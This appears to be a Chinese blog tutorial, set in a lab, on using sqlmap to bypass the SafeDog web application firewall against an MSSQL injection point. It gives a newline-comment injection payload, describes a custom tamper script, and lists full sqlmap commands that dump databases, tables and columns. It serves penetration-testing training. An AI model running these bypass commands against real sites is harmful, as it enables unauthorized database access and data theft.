SQLMAP工具之实战渗透技巧四

文中通过详细讲解SQLMAP工具,更加深入的掌握SQLMAP用法;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

sqlmap实战渗透技巧四

带安全狗靶场环境

当我们会遇到各种防护软件,这里在靶场环境中安装安全狗,然后我们进行测试,当我们输入and 1=1的时候,发现存在防护被拦截,并跳出提示:
在这里插入图片描述
我们使用sqlmap进行攻击时,可以在安全狗上看出被拦截的提示:

sqlmap -u http://www.p2.com/inj.aspx?id=1 -v 1

在这里插入图片描述

修改请求头

我们可以使用–random-agent 来先改变请求头:

sqlmap -u http://www.p2.com/inj.aspx?id=1 -v 1 --random-agent --flush-session

这里可以看出能够通过修改请求头来绕过,并存在有注入:
在这里插入图片描述
但是安全狗上依然会有大量的攻击日志记录:
在这里插入图片描述
而且我们使用此方法是不能得出在等到数据:
在这里插入图片描述

利用换行来绕过

这里我们可以简单的通过手工注入方法来进行测试:

--/*%0a这里是你的填写你的注入语句--%20*/

从这个测试我们可以看出当使用这个语句来进行检查时,并不会像一开始直接对我们进行拦截,这个主要的原理是,在sqlserver中 如果使用换行,会把前面的当成注释,而不管后面的执行内容,从而将内容带到数据库中进行查询,所有我们的and 1=1 就被显示,没有被防护设备拦截
在这里插入图片描述
在这里插入图片描述

编写tamper脚本

同理我们就可以根据这一原理,来编写一个tamper脚本:
在这里插入图片描述
主要的意思就是在我们执行payload的时候,都会正在前面加上–/ %0a :*

sqlmap -u http://www.p2.com/inj.aspx?id=1 --dbms="MSSQL" --tamper bypass_safe_dog.py -v 4 --flushsession --batch --tech=U --random-agent --dbs

使用SQLMAP进行注入

这里就可以成功跑出数据库:
在这里插入图片描述
同理我们就可以利用这个脚本跑出表,跑出字段。

sqlmap -u http://www.p2.com/inj.aspx?id=1 --dbms="MSSQL" --tamper bypass_safe_dog.py -v 4 --batch --tech=U --random-agent -D Angelcms --tables --columns --dump

但在这里需要将线程调低,以及加上参数–delay 等待上几秒在返回我们的信息。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值